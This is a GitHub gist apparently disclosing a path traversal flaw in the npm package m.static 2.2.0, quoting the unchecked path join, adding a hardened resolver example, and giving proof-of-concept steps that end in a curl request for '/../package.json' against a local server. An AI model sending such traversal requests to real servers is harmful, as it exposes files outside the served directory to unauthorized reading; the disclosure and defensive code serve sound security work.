@lirantal
Created November 22, 2022 21:18
Path traversal vulnerability in m.static@2.2.0

m.static describes itself as: m(icro)static is a lightweight static file server for node.js written in es6+.

Observation:

  • Virtually zero downloads, so no considerable impact.
  • It was last published 4 years ago.

Resources:

Background on exploitation

This file server library is vulnerable to path traversal attacks because it applies no input sanitization or other checks to the requested path:

Line 19 of index.js:

    const requestFile = join(options.cwd, req.url)

This vulnerability should probably be classified as a CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal').
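The unchecked join from line 19 next to one way of containing the resolved path, as an added example that is not part of the original gist or of m.static. The names vulnerableResolve and safeResolve and the sample root directory are hypothetical.

```javascript
const path = require('node:path');

// Same pattern as index.js line 19: req.url is joined to the root unchecked,
// so ".." segments are normalized away and the result can leave the root.
function vulnerableResolve(cwd, reqUrl) {
  return path.join(cwd, reqUrl);
}

// Hypothetical hardened helper: returns an absolute path inside cwd, or null.
// Assumption: symlinks inside the root are out of scope here; a server that
// must handle them would also compare fs.realpath() results.
function safeResolve(cwd, reqUrl) {
  const root = path.resolve(cwd);
  let pathname;
  try {
    // Drop query string and fragment, then percent-decode once.
    pathname = decodeURIComponent(reqUrl.split(/[?#]/, 1)[0]);
  } catch {
    return null; // malformed percent-encoding
  }
  if (pathname.includes('\0')) return null; // NUL is never valid in a path
  // Prefix with "." so a leading "/" cannot make resolve() discard the root.
  const candidate = path.resolve(root, '.' + path.sep + pathname);
  // Compare against root + separator so a sibling such as "public-old"
  // is not accepted for the root "public".
  if (candidate !== root && !candidate.startsWith(root + path.sep)) return null;
  return candidate;
}

// Constructed sample requests against a constructed root directory.
const SAMPLE_ROOT = '/srv/app/public';
for (const url of ['/index.html', '/../package.json', '/%2e%2e/package.json']) {
  console.log(url, '->', vulnerableResolve(SAMPLE_ROOT, url), '|', safeResolve(SAMPLE_ROOT, url));
}
```

A request handler would respond with 403 or 404 whenever safeResolve returns null, and only open the file otherwise.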

Proof of Concept exploit

  1. Install the latest version of m.static (npm install --save m.static@2.2.0)
  2. Make sure you have a public/ directory with files in it
  3. Run the server: npx m.static --port 3000 --cwd public/
  4. Send a request for a file outside the static directory to confirm that the path traversal succeeds: curl --path-as-is "http://localhost:3000/../package.json" and observe the contents of the file returned in the response

    .
    ├── public
    │   └── index.html
    ├── server.js
    └── package.json

Author

Liran Tal
